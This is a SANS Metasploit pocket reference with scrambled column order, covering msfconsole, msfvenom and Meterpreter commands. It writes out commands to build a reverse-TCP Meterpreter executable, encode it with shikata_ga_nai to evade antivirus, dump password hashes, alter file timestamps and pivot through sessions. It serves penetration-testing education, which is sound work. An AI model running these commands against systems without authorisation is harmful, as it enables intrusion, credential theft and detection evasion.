Meterpreter Post Modules msfvenom Metasploit

With an available Meterpreter session, post modules The msfvenom tool can be used to generate Metasploit Cheat Sheet
can be run on the target machine. payloads (such as Meterpreter) as standalone files and By Ed Skoudis and
Post Modules from Meterpreter optionally encode them. This tool replaces the now Yori Kvitchko
removed msfpayload and msfencode. Run with a ‘'-l
meterpreter > run post/multi/gather/env POCKET REFERENCE GUIDE
payloads’ gives a list of payloads.
Post Modules on a Backgrounded Session $ msfvenom –p [ExploitPath] http://www.sans.org

msf > use post/windows/gather/hashdump LHOST=[LocalHost (if reverse conn.)]

msf > show options LPORT=[LocalPort] –f [FormatType]
Purpose
msf > set SESSION 1 Example
msf > run Reverse Meterpreter payload as an executable and The purpose of this cheat sheet is to
redirected into a file: describe some common options for some
$ msfvenom -p of the various components of the
Useful Auxiliary Modules
windows/meterpreter/reverse_tcp Metasploit Framework
Port Scanner: LHOST=10.1.1.1 LPORT=4444 –f exe > met.exe
msf > use Format Options (specified with –f)
auxiliary/scanner/portscan/tcp --help-formats – Print out a summary of the
Tools Described on This Sheet
SANS
msf > set RHOSTS 10.10.10.0/24 EDU VN specified options
msf > run exe – Executable Metasploit
pl – Perl The Metasploit Framework is a development platform
DNS Enumeration
rb – Ruby for developing and using security tools and exploits.
msf > use auxiliary/gather/dns_enum raw – Raw shellcode
msf > set DOMAIN target.tgt c – C code Metasploit Meterpreter
msf > run Encoding Payloads with msfvenom The Meterpreter is a payload within the Metasploit
FTP Server The msfvenom tool can be used to apply a level of Framework which provides control over an exploited
encoding for anti-virus bypass. Run with '-l encoders' target system, running as a DLL loaded inside of any
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot gives a list of encoders. process on a target machine.
msf > run $ msfvenom –p [Payload] -e [Encoder] -f
[FormatType (exe, perl, ruby, raw, c)] -i Metasploit msfvenom
Proxy Server [EncodeInterations] -o [OutputFilename] The msfvenom tool is component of the Metasploit
msf > use auxiliary/server/socks4 Example Framework
SANS which
EDU VNallows the user to generate a
msf > run Encode a payload from msfpayload 5 times using shikata- standalone version of any payload within the
Any proxied traffic that matches the subnet of a route ga-nai encoder and output as executable: framework. Payloads can be generated in a variety of
will be routed through the session specified by route. $ msfvenom –p formats including executable, Perl script and raw
windows/meterpreter/reverse_tcp -i 5 -e shellcode. This payload can also be encoded to help
Use proxychains configured for socks4 to route any x86/shikata_ga_nai -f exe -o mal.exe avoid detection, thus encapsulating both msfpayload
applications traffic through a Meterpreter session. and msfencode functionality.
 Metasploit Console Basics (msfconsole) Metasploit Meterpreter (contd) Managing Sessions
Search for module: Process Commands: Multiple Exploitation:
msf > search [regex] getpid: Display the process ID that Meterpreter is
running inside Run the exploit expecting a single session that is
Specify and exploit to use: getuid: Display the user ID that Meterpreter is immediately backgrounded:
msf > use exploit/[ExploitPath] running with msf > exploit -z
ps: Display process list
Specify a Payload to use: kill: Terminate a process given its process ID Run the exploit in the background expecting one or
msf > set PAYLOAD [PayloadPath] execute: Run a given program with the privileges more sessions that are immediately backgrounded:
of the process the Meterpreter is loaded in msf > exploit –j
Show options for the current modules: migrate: Jump to a given destination process ID
msf > show options - Target process must have same or lesser privileges List all current jobs (usually exploit listeners):
- Target process may be a more stable process msf > jobs –l
Set options: - When inside a process, can access any files that
msf > set [Option] [Value] process has a lock on Kill a job:
msf > jobs –k [JobID]
Start exploit: Network Commands:
msf > exploit SANS EDU VN ipconfig: Show network interface information Multiple Sessions:
portfwd: Forward packets through TCP session
route: Manage/view the system's routing table List all backgrounded sessions:
Metasploit Meterpreter msf > sessions -l
Base Commands: Misc Commands:
? / help: Display a summary of commands idletime: Display the duration that the GUI of the Interact with a backgrounded sessions:
exit / quit: Exit the Meterpreter session target machine has been idle msf > session -i [SessionID]
sysinfo: Show the system name and OS type uictl [enable/disable]
shutdown / reboot: Self-explanatory [keyboard/mouse]: Enable/disable either the Background the current interactive session:
mouse or keyboard of the target machine meterpreter > <Ctrl+Z>
File System Commands: screenshot: Save as an image a screenshot of or
cd: Change directory the target machine meterpreter > background
lcd: Change directory on local (attacker's) machine
pwd / getwd: Display current working directory Additional Modules: Routing Through
SANS EDU Sessions:
VN
ls: Show the contents of the directory use [module]: Load the specified module
cat: Display the contents of a file on screen Example: All modules (exploits/post/aux) against the target
download / upload: Move files to/from the target use priv: Load the priv module subnet mask will be pivoted through this session.
machine hashdump: Dump the hashes from the box msf > route add [Subnet to Route To]
mkdir / rmdir: Make / remove directory timestomp:Alter NTFS file timestamps [Subnet Netmask] [SessionID]
edit: Open a file in the default editor (typically vi)